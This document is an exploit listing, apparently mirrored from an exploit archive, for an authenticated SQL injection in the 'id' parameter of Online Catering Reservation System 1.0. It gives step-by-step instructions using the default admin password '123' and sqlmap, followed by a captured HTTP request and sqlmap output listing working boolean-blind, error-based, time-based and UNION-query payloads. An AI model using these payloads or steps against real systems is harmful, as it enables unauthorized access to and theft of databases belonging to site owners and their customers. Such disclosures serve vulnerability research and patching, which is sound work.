Exploit for Online Catering Reservation System 1.0 SQL Injection

Name: Exploit for Online Catering Reservation System 1.0 SQL Injection
Rating: 5 (294 reviews)
2021-02-26 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:161572
# Exploit Title: Online Catering Reservation System - SQL Injection   
(Authenticated)  
# Date: 2021-02-25  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage:   
https://www.sourcecodester.com/php/11355/online-catering-reservation.html  
# Software Link:   
https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip  
# Version: v1.0  
# Tested on: Ubuntu 20.04.2  
  
Parameter id in reservation_view.php is vulnerable to SQL Injection.  
  
POC  
---  
1) Visit http://VICTIM/admin/  
2) Put the default pass: 123  
3) Go to Reservation->Confirmed Reservation -> View reservation or visit   
http://VICTIM/admin/reservation_view.php?id=1.  
4) Save the request using Burp Suite as yourfile.txt  
5) sqlmap -r yourfile.txt  
  
REQUEST  
-------  
GET /admin/reservation_view.php?id=1 HTTP/1.1  
Host: 192.168.1.117  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101   
Firefox/78.0  
Accept:   
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: sid=8spj19f306lim9ve5hg9iq56sf; lang=CZ;   
PHPSESSID=mdmn8a55hibuh8pav5serqhum1  
Upgrade-Insecure-Requests: 1  
  
  
SQLMAP OUTPUT  
-------------  
Parameter: id (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL   
comment)  
Payload: id=1' OR NOT 3039=3039#  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or   
GROUP BY clause (FLOOR)  
Payload: id=1' OR (SELECT 9283 FROM(SELECT   
COUNT(*),CONCAT(0x716b6b7171,(SELECT   
(ELT(9283=9283,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM   
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xbWN  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 OR time-based blind  
Payload: id=1' OR SLEEP(5)-- hENp  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 24 columns  
Payload: id=1' UNION ALL SELECT   
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7171,0x535a755264454a726a6350517146596d615a77595a71666a63524372725a4a506a7973684a567251,0x717a6a7071)#